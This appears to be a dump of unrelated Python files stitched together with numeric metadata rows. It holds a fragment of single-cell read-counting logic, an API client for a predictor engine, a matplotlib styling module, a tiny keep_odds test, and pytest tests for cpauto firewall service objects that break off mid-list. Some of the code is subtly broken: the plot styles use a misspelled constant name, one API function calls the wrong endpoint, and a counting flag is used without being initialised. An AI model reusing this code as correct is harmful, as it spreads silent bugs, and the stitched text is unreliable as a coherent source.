# Singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
else:
# Non-singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in non-validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
else:
# Non-singleton in non-validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant. Count anyways
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
class SmartSeq2(Logic):
"""SmartSeq2 logic
"""
def __init__(self) -> None:
self.name = "SmartSeq2"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return ["spliced", "unspliced", "ambiguous", "spanning"]
@property
def stranded(self) -> bool:
return False
@property
def perform_validation_markup(self) -> bool:
return False
@property
def accept_discordant(self) -> bool:
return False
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
# NOTE This can be simplified qyuite a bit, without loss of acuracy!
# The hits are not compatible with any annotated transcript model
spliced = dict_layers_columns["spliced"]
unspliced = dict_layers_columns["unspliced"]
ambiguous = dict_layers_columns["ambiguous"]
spanning = dict_layers_columns["spanning"]
if len(molitem.mappings_record) == 0:
return
# Compatible with one or more transcript models:
else:
# Check that there are not different possible genes ??
if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
gene_check: Set[str] = set()
has_onlyintron_model = 0
has_only_span_exin_model = 1
has_onlyexo_model = 0
has_mixed_model = 0
multi_gene = 0
for transcript_model, segments_list in molitem.mappings_record.items():
gene_check.add(transcript_model.geneid)
if len(gene_check) > 1:
multi_gene = 1
has_introns = 0
has_exons = 0
has_exseg_with_spliced_flag = 0
has_exin_intron_span = 0
for segment_match in segments_list:
if segment_match.maps_to_intron:
has_introns = 1
if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
downstream_exon = segment_match.feature.get_downstream_exon()
if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
upstream_exon = segment_match.feature.get_upstream_exon()
if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
elif segment_match.maps_to_exon:
has_exons = 1
if segment_match.is_spliced:
has_exseg_with_spliced_flag = 1
if has_introns and not has_exons:
has_onlyintron_model = 1
if has_exons and not has_introns:
has_onlyexo_model = 1
if has_exons and has_introns and not has_exin_intron_span:
has_valid_mixed_model = 1
has_mixed_model = 1
if not has_exin_intron_span:
has_only_span_exin_model = 0
if multi_gene:
# Many genes are compatible with the observation, do not count
return
else:
if not len(molitem.mappings_record):
# NOTE it does not happen for Smartseq2
# No gene is compatible with the observation, do not count
return
else:
if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
# More common situation, normal exonic read, count as spliced
gene_ix = geneid2ix[transcript_model.geneid]
spliced[gene_ix, cell_bcidx] += 1
return
if has_only_span_exin_model:
# NOTE This is what I want to count as spanning
# All the compatible transcript models have spanning exon-intron boundaries, count unspliced
gene_ix = geneid2ix[transcript_model.geneid]
spanning[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_mixed_model and not has_onlyexo_model:
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# NOTE has_mixed model is used only here in this logic
# Ambiguity among the transcript models compatible with the mapping. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
Default: type = Permissive10X
| 55.770779
| 169
| 0.536536
| 6,714
| 63,746
| 4.809651
| 0.036491
| 0.028614
| 0.039019
| 0.043788
| 0.958844
| 0.958844
| 0.953456
| 0.951443
| 0.949647
| 0.949616
| 0
| 0.012987
| 0.421391
| 63,746
| 1,142
| 170
| 55.819615
| 0.862515
| 0.180921
| 0
| 0.961894
| 0
| 0
| 0.00908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054273
| false
| 0
| 0.004619
| 0.035797
| 0.218245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd21e1e0a59ba73af63b160fee5eecec090f10a1
| 7,836
|
py
|
Python
|
runtime/apis/predictor_engine.py
|
ecosystemai/ecosystem-notebooks
|
7282f22fbe7ab7a43b2b0c06c74b3f176defaca4
|
[
"MIT"
] | 2
|
2020-08-30T12:50:47.000Z
|
2020-11-24T12:59:43.000Z
|
runtime/apis/predictor_engine.py
|
ecosystemai/ecosystem-notebooks
|
7282f22fbe7ab7a43b2b0c06c74b3f176defaca4
|
[
"MIT"
] | null | null | null |
runtime/apis/predictor_engine.py
|
ecosystemai/ecosystem-notebooks
|
7282f22fbe7ab7a43b2b0c06c74b3f176defaca4
|
[
"MIT"
] | 2
|
2020-09-02T16:54:25.000Z
|
2021-06-20T20:30:11.000Z
|
from runtime.endpoints import predictor_engine as endpoints
from runtime import request_utils
def get_spending_personality(auth, campaign, channel, customer, headers, params, subcampaign, userid):
# Provide spending personality scores for customers.
# auth: Authentication token generated by access.Authenticate()
# campaign: The name of the campaign. (string)
# channel: The type of channel. (options: "all", "")
# customer: The id of the customer. (string)
# headers: Added headers. ()
# params: Addtional parameters added in a dictionary format as a string: ('{"value_1": 300, "value_2": "entry"}')
# subcampaign: Name of the subcampaigns. (string)
# userid: The id of the user. (string)
ep = endpoints.GET_SPENDING_PERSONALITY
param_dict = {
"campaign": campaign,
"channel": channel,
"customer": customer,
"headers": headers,
"params": params,
"subcampaign": subcampaign,
"userid": userid
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def put_spending_personality(auth, document, headers):
# Update offers taken up by customers
# document: Documents to be updated. ()
# headers: Added headers. ()
ep = endpoints.PUT_SPENDING_PERSONALITY
param_dict = {
"document": document,
"headers": headers
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def model_detail(auth, model):
# Model details.
# model: Model's details to examine. Example parameter: {'mojo':'my_mojo.zip'}
ep = endpoints.GET_OFFER_RECOMMENDATIONS
param_dict = {
"model": model
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def get_offer_recommendations(auth, campaign, channel, customer, headers, numberoffers, params, subcampaign, userid):
# Provide offers that form part of a campaign for particular customer.
# auth: Authentication token generated by access.Authenticate()
# campaign: The name of the campaign. (string)
# channel: The type of channel. (options: "all", "")
# customer: The id of the customer. (string)
# headers: Added headers. ()
# numberoffers: Number of offers to get. (int)
# params: Addtional parameters added in a dictionary format as a string: ('{"value_1": 300, "value_2": "entry"}')
# subcampaign: Name of the subcampaigns. (string)
# userid: The id of the user. (string)
ep = endpoints.GET_OFFER_RECOMMENDATIONS
param_dict = {
"campaign": campaign,
"channel": channel,
"customer": customer,
"headers": headers,
"numberoffers": numberoffers,
"params": params,
"subcampaign": subcampaign,
"userid": userid
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def put_offer_recommendations(auth, document, headers):
# Update offers taken up by customers
# document: Documents to be updated. ()
# headers: Added headers. ()
ep = endpoints.PUT_OFFER_RECOMMENDATIONS
param_dict = {
"document": document,
"headers": headers
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def get_personality_recommender(auth, campaign, channel, customer, headers, numberoffers, params, subcampaign, userid):
# Provide offers that form part of a campaign for particular customer.
# auth: Authentication token generated by access.Authenticate()
# campaign: The name of the campaign. (string)
# channel: The type of channel. (options: "all", "")
# customer: The id of the customer. (string)
# headers: Added headers. ()
# numberoffers: Number of offers to get. (int)
# params: Addtional parameters added in a dictionary format as a string: ('{"value_1": 300, "value_2": "entry"}')
# subcampaign: Name of the subcampaigns. (string)
# userid: The id of the user. (string)
ep = endpoints.GET_PERSONALITY_RECOMMENDER
param_dict = {
"campaign": campaign,
"channel": channel,
"customer": customer,
"headers": headers,
"numberoffers": numberoffers,
"params": params,
"subcampaign": subcampaign,
"userid": userid
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def put_personality_recommender(auth, document, headers):
# Update offers taken up by customers
# document: Documents to be updated. ()
# headers: Added headers. ()
ep = endpoints.PUT_PERSONALITY_RECOMMENDER
param_dict = {
"document": document,
"headers": headers
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def predictor_response_preload(auth, detail, value):
# Perform prediction on pre-loaded model with detail: none, basic or all.
# Perform a database lookup if properties file has been set.
# The predictor parameters are broken into two types namely,
# requiring all parameters via API or requiring a lookup key via API and extracting parameters from a data source.
# Use this format for input prams only:
# Update offers taken up by customers
# detail: Documents to be updated. (string: "none", "basic", "all")
# value: Input parameter.
# {
# 'name':'predict1',
# 'mojo':'model_mojo.zip',
# 'dbparam':false,
# 'input': ['x','y'],
# 'value': ['val_x', 'val_y']
# }
# Use this approach for inputs from data source:
# {
# 'name':'predict1',
# 'mojo':'model_mojo.zip',
# 'dbparam':true,
# 'lookup':{key:'customer',value:1234567890}
# }
# For post-scoring logic, then use this configuration:
# {
# 'name':'predict1',
# 'mojo':'1',
# 'mab':{'class':'mabone', 'epsilon':0.4},
# 'dbparam':true,
# 'lookup':{key:'customer',value:1234567890},
# 'param':{key:'value_field', value:30}
#}
ep = endpoints.PREDICTOR_RESPONSE_PRELOAD
param_dict = {
"detail": detail,
"value": value
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def predictor_response_preload_kafka(auth, detail, value):
# Perform prediction on pre-loaded model with detail and push onto Kafka topic: none, basic or all.
# Perform a database lookup if properties file has been set.
# detail: Documents to be updated. (string: "none", "basic", "all")
# value: Input parameter.
# {
# 'name':'predict1',
# 'kafka':{'TOPIC_NAME':'ecosystem1','log':'true'},
# 'mojo':'1', 'input':['x','y'],
# 'value':['val_x','val_y']
# }
# OR
# {
# 'name':'predict1',
# 'kafka':{'TOPIC_NAME':'ecosystem1','log':'true'},
# 'mojo':'1',
# 'dbparam':true,
# 'lookup':{key:'customer',value:'1234567890'}
# }
ep = endpoints.PREDICTOR_RESPONSE_PRELOAD_KAFKA
param_dict = {
"detail": detail,
"value": value
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def refresh(auth, headers):
# Refresh product matrix and master
# headers: Added headers. ()
ep = endpoints.REFRESH
param_dict = {
"headers": headers
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
def run_model_mojo(auth, detail, value):
# Perform basic prediction on model with detail: none, basic or all.
# detail: Documents to be updated. (string: "none", "basic", "all")
# value: Input parameter.
# {
# 'mojo':'model_mojo.zip',
# 'input': ['x','y'],
# 'value': ['val_x', 'val_y']
# }
ep = endpoints.RUN_MODEL_MOJO
param_dict = {
"detail": detail,
"value": value
}
resp = request_utils.create(auth, ep, params=param_dict)
meta = resp.json()
return meta
| 34.368421
| 119
| 0.659265
| 949
| 7,836
| 5.343519
| 0.17176
| 0.039046
| 0.034707
| 0.047722
| 0.805758
| 0.779333
| 0.773417
| 0.719779
| 0.707947
| 0.707947
| 0
| 0.009559
| 0.212353
| 7,836
| 227
| 120
| 34.519824
| 0.812054
| 0.497192
| 0
| 0.706897
| 0
| 0
| 0.071094
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094828
| false
| 0
| 0.017241
| 0
| 0.206897
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd2597914ea40af4fd7b259e6a3651c1a4dd1cf2
| 5,888
|
py
|
Python
|
matplotlibstyles/styles.py
|
cumberworth/matplotlibstyles
|
1e5fbd7dcb249067d33f89e47291b279e0e3932e
|
[
"MIT"
] | null | null | null |
matplotlibstyles/styles.py
|
cumberworth/matplotlibstyles
|
1e5fbd7dcb249067d33f89e47291b279e0e3932e
|
[
"MIT"
] | null | null | null |
matplotlibstyles/styles.py
|
cumberworth/matplotlibstyles
|
1e5fbd7dcb249067d33f89e47291b279e0e3932e
|
[
"MIT"
] | null | null | null |
"""Styles for creating plots with matplotlib."""
import matplotlib as mpl
from matplotlib import pyplot as plt
SHARE_PGF_PREAMBLE = "\n".join(
[
r"\usepackage[RGB]{xcolor}",
r"\usepackage{fontspec}",
r"\usepackage{unicode-math}",
r"\setmainfont{STIX Two Text}",
r"\setmathfont{STIX Two Math}",
# r"\usepackage{stix2}",
r"\usepackage{nicefrac}",
r"\usepackage{siunitx}",
r"\DeclareSIUnit{\molar}{M}",
r"\DeclareSIUnit{\kb}{\ensuremath{\mathit{k_\textrm{B}}}}",
r"\DeclareSIUnit{\kbT}{\ensuremath{\mathit{k_\textrm{B} T}}}",
]
)
TEXTBLACK = "0.125"
def set_default_style():
# Lines
plt.rcParams["lines.linewidth"] = 1.0
plt.rcParams["lines.markeredgewidth"] = 1.0
plt.rcParams["lines.markersize"] = 5
# Fonts and symbols
plt.rcParams["font.family"] = "serif"
plt.rcParams["font.serif"] = "Times New Roman"
plt.rcParams["font.weight"] = "normal"
plt.rcParams["font.size"] = 8
plt.rcParams["axes.titlesize"] = 8
plt.rcParams["axes.labelsize"] = 8
plt.rcParams["xtick.labelsize"] = 8
plt.rcParams["ytick.labelsize"] = 8
plt.rcParams["legend.fontsize"] = 8
plt.rcParams["text.usetex"] = False
plt.rcParams["mathtext.rm"] = "serif"
plt.rcParams["mathtext.it"] = "serif:italic"
plt.rcParams["mathtext.fontset"] = "stix"
# Axes
plt.rcParams["axes.linewidth"] = 0.8
plt.rcParams["axes.spines.right"] = False
plt.rcParams["axes.spines.top"] = False
# Ticks
plt.rcParams["xtick.color"] = (0.0, 0.0, 0.0)
plt.rcParams["xtick.major.width"] = 0.8
plt.rcParams["ytick.color"] = (0.0, 0.0, 0.0)
plt.rcParams["ytick.major.width"] = 0.8
# Errorbar plots
plt.rcParams["errorbar.capsize"] = 2
# Legend
plt.rcParams["legend.frameon"] = False
plt.rcParams["legend.framealpha"] = 0.0
def set_thin_style():
# Lines
plt.rcParams["lines.linewidth"] = 0.5
plt.rcParams["lines.markeredgewidth"] = 0.7
plt.rcParams["lines.markersize"] = 2.5
# Fonts and symbols
plt.rcParams["font.family"] = "serif"
plt.rcParams["font.serif"] = "Times New Roman"
plt.rcParams["font.weight"] = "normal"
plt.rcParams["font.size"] = 8
plt.rcParams["axes.titlesize"] = 8
plt.rcParams["axes.labelsize"] = 8
plt.rcParams["xtick.labelsize"] = 8
plt.rcParams["ytick.labelsize"] = 8
plt.rcParams["legend.fontsize"] = 8
plt.rcParams["text.usetex"] = False
plt.rcParams["mathtext.rm"] = "serif"
plt.rcParams["mathtext.it"] = "serif:italic"
plt.rcParams["mathtext.fontset"] = "stix"
# Axes
plt.rcParams["axes.edgecolor"] = (0.0, 0.0, 0.0)
plt.rcParams["axes.linewidth"] = 0.5
plt.rcParams["axes.spines.right"] = False
plt.rcParams["axes.spines.top"] = False
# Ticks
plt.rcParams["xtick.color"] = (0.0, 0.0, 0.0)
plt.rcParams["xtick.major.width"] = 0.5
plt.rcParams["ytick.color"] = (0.0, 0.0, 0.0)
plt.rcParams["ytick.major.width"] = 0.5
# Errorbar plots
plt.rcParams["errorbar.capsize"] = 1.0
# Legend
plt.rcParams["legend.frameon"] = False
plt.rcParams["legend.framealpha"] = 0.0
def set_default_latex_style():
mpl.use("pgf")
plt.rcParams["lines.linewidth"] = 1.0
plt.rcParams["lines.markeredgewidth"] = 1.0
plt.rcParams["lines.markersize"] = 2.5
# Fonts and symbols
plt.rcParams["pgf.texsystem"] = "lualatex"
plt.rcParams["pgf.rcfonts"] = False
plt.rcParams["text.usetex"] = True
plt.rcParams["font.family"] = "serif"
plt.rcParams["font.serif"] = ["STIX Two Text"]
plt.rcParams["text.color"] = "black"
plt.rcParams["font.size"] = 8
plt.rcParams["axes.titlesize"] = 8
plt.rcParams["axes.labelsize"] = 8
plt.rcParams["xtick.labelsize"] = 8
plt.rcParams["ytick.labelsize"] = 8
plt.rcParams["legend.fontsize"] = 8
plt.rcParams["pgf.preamble"] = SHARED_PGF_PREAMBLE
# Axes
plt.rcParams["axes.edgecolor"] = "black"
plt.rcParams["axes.labelcolor"] = "black"
plt.rcParams["axes.linewidth"] = 0.8
plt.rcParams["axes.spines.right"] = False
plt.rcParams["axes.spines.top"] = False
# Ticks
plt.rcParams["xtick.color"] = "black"
plt.rcParams["xtick.major.width"] = 0.8
plt.rcParams["ytick.color"] = "black"
plt.rcParams["ytick.major.width"] = 0.8
# Errorbar plots
plt.rcParams["errorbar.capsize"] = 2
# Legend
plt.rcParams["legend.frameon"] = False
plt.rcParams["legend.framealpha"] = 0.0
def set_thin_latex_style():
mpl.use("pgf")
plt.rcParams["lines.linewidth"] = 0.5
plt.rcParams["lines.markeredgewidth"] = 0.7
plt.rcParams["lines.markersize"] = 2.5
# Fonts and symbols
plt.rcParams["pgf.texsystem"] = "lualatex"
plt.rcParams["pgf.rcfonts"] = False
plt.rcParams["text.usetex"] = True
plt.rcParams["font.family"] = "serif"
plt.rcParams["font.serif"] = ["STIX Two Text"]
plt.rcParams["text.color"] = TEXTBLACK
plt.rcParams["font.size"] = 8
plt.rcParams["axes.titlesize"] = 8
plt.rcParams["axes.labelsize"] = 8
plt.rcParams["xtick.labelsize"] = 8
plt.rcParams["ytick.labelsize"] = 8
plt.rcParams["legend.fontsize"] = 8
plt.rcParams["pgf.preamble"] = SHARE_PGF_PREAMBLE
# Axes
plt.rcParams["axes.edgecolor"] = TEXTBLACK
plt.rcParams["axes.labelcolor"] = TEXTBLACK
plt.rcParams["axes.linewidth"] = 0.5
plt.rcParams["axes.spines.right"] = False
plt.rcParams["axes.spines.top"] = False
# Ticks
plt.rcParams["xtick.color"] = TEXTBLACK
plt.rcParams["xtick.major.width"] = 0.5
plt.rcParams["ytick.color"] = TEXTBLACK
plt.rcParams["ytick.major.width"] = 0.5
# Errorbar plots
plt.rcParams["errorbar.capsize"] = 1.0
# Legend
plt.rcParams["legend.frameon"] = False
plt.rcParams["legend.framealpha"] = 0.0
| 30.666667
| 70
| 0.631114
| 762
| 5,888
| 4.853018
| 0.141732
| 0.324229
| 0.09086
| 0.016225
| 0.868307
| 0.852893
| 0.847485
| 0.826393
| 0.82477
| 0.814494
| 0
| 0.025147
| 0.189538
| 5,888
| 191
| 71
| 30.827225
| 0.74979
| 0.047894
| 0
| 0.734848
| 0
| 0
| 0.360165
| 0.055217
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.015152
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dd36e26de922012af1b05843435a58e79cb984fc
| 110
|
py
|
Python
|
20181026-TestingInJupyter/tests/test_keep_odds.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 6
|
2017-10-31T20:54:37.000Z
|
2020-10-23T19:03:00.000Z
|
20181026-TestingInJupyter/tests/test_keep_odds.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 7
|
2020-03-24T16:14:34.000Z
|
2021-03-18T20:51:37.000Z
|
20181026-TestingInJupyter/tests/test_keep_odds.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 1
|
2019-07-29T07:55:49.000Z
|
2019-07-29T07:55:49.000Z
|
from keep_odds import keep_odds
def test_keep_odds():
assert keep_odds([1, 2, 3, 4, 5, 6]) == [1, 3, 5]
| 18.333333
| 53
| 0.627273
| 22
| 110
| 2.909091
| 0.590909
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.209091
| 110
| 5
| 54
| 22
| 0.632184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dd3741224070231dbb8d9251b1cd4b56f761814c
| 10,565
|
py
|
Python
|
tests/objects/test_service.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 16
|
2016-12-07T02:45:31.000Z
|
2022-01-20T11:46:24.000Z
|
tests/objects/test_service.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 2
|
2017-07-20T21:12:27.000Z
|
2021-09-09T14:57:01.000Z
|
tests/objects/test_service.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 5
|
2017-07-28T14:06:25.000Z
|
2021-09-06T12:01:18.000Z
|
# -*- coding: utf-8 -*-
"""Tests for cpauto.objects.service module."""
import pytest
import responses
import cpauto
@pytest.mark.parametrize("name,params", [
("servicename", {}),
("servicename", {"tags": ["foo", "bar"]}),
])
def test_add(core_client, mgmt_server_base_uri, name, params):
resources = [ "add-service-tcp", "add-service-udp",
"add-service-sctp", "add-service-other",
"add-service-group", "add-service-dce-rpc",
"add-service-rpc" ]
with responses.RequestsMock() as rsps:
resp_body = {'foo': 'bar', 'message': 'OK'}
for resource in resources:
endpoint = mgmt_server_base_uri + resource
rsps.add(responses.POST, endpoint,
json=resp_body, status=200,
content_type='application/json')
s = cpauto.ServiceTCP(core_client)
r = s.add(name=name, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceUDP(core_client)
r = s.add(name=name, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceSCTP(core_client)
r = s.add(name=name, port='3000', params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceOther(core_client)
r = s.add(name=name, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceGroup(core_client)
r = s.add(name=name, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceDCERPC(core_client)
r = s.add(name=name, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceRPC(core_client)
r = s.add(name=name, params=params)
assert r.status_code == 200
assert r.json() == resp_body
@pytest.mark.parametrize("name,uid,details_level", [
("servicename", "", ""),
("", "serviceuid", ""),
("servicename", "", "uid"),
("", "serviceuid", "full"),
])
def test_show(core_client, mgmt_server_base_uri, name, uid, details_level):
resources = [ "show-service-tcp", "show-service-udp",
"show-service-sctp", "show-service-other",
"show-service-group", "show-service-dce-rpc",
"show-service-rpc" ]
with responses.RequestsMock() as rsps:
resp_body = {'foo': 'bar', 'message': 'OK'}
for resource in resources:
endpoint = mgmt_server_base_uri + resource
rsps.add(responses.POST, endpoint,
json=resp_body, status=200,
content_type='application/json')
s = cpauto.ServiceTCP(core_client)
r = s.show(name=name, uid=uid, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceUDP(core_client)
r = s.show(name=name, uid=uid, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceSCTP(core_client)
r = s.show(name=name, uid=uid, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceOther(core_client)
r = s.show(name=name, uid=uid, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceGroup(core_client)
r = s.show(name=name, uid=uid, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceDCERPC(core_client)
r = s.show(name=name, uid=uid, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceRPC(core_client)
r = s.show(name=name, uid=uid, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
@pytest.mark.parametrize("name,uid,params", [
("servicename", "", {"tags": ["foo", "bar"]}),
("", "serviceuid", {"ignore-errors": True}),
])
def test_set(core_client, mgmt_server_base_uri, name, uid, params):
resources = [ "set-service-tcp", "set-service-udp",
"set-service-sctp", "set-service-other",
"set-service-group", "set-service-dce-rpc",
"set-service-rpc" ]
with responses.RequestsMock() as rsps:
resp_body = {'foo': 'bar', 'message': 'OK'}
for resource in resources:
endpoint = mgmt_server_base_uri + resource
rsps.add(responses.POST, endpoint,
json=resp_body, status=200,
content_type='application/json')
s = cpauto.ServiceTCP(core_client)
r = s.set(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceUDP(core_client)
r = s.set(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceSCTP(core_client)
r = s.set(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceOther(core_client)
r = s.set(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceGroup(core_client)
r = s.set(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceDCERPC(core_client)
r = s.set(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceRPC(core_client)
r = s.set(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
@pytest.mark.parametrize("name,uid,params", [
("servicename", "", {}),
("", "serviceuid", {}),
("servicename", "", {'details-level': 'full'}),
("", "serviceuid", {'ignore-errors': True}),
])
def test_delete(core_client, mgmt_server_base_uri, name, uid, params):
resources = [ "delete-service-tcp", "delete-service-udp",
"delete-service-sctp", "delete-service-other",
"delete-service-group", "delete-service-dce-rpc",
"delete-service-rpc" ]
with responses.RequestsMock() as rsps:
resp_body = {'foo': 'bar', 'message': 'OK'}
for resource in resources:
endpoint = mgmt_server_base_uri + resource
rsps.add(responses.POST, endpoint,
json=resp_body, status=200,
content_type='application/json')
s = cpauto.ServiceTCP(core_client)
r = s.delete(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceUDP(core_client)
r = s.delete(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceSCTP(core_client)
r = s.delete(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceOther(core_client)
r = s.delete(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceGroup(core_client)
r = s.delete(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceDCERPC(core_client)
r = s.delete(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceRPC(core_client)
r = s.delete(name=name, uid=uid, params=params)
assert r.status_code == 200
assert r.json() == resp_body
@pytest.mark.parametrize("limit,offset,order,details_level", [
(50, 0, [], ''),
(50, 0, [{'ASC': 'foo'}], ''),
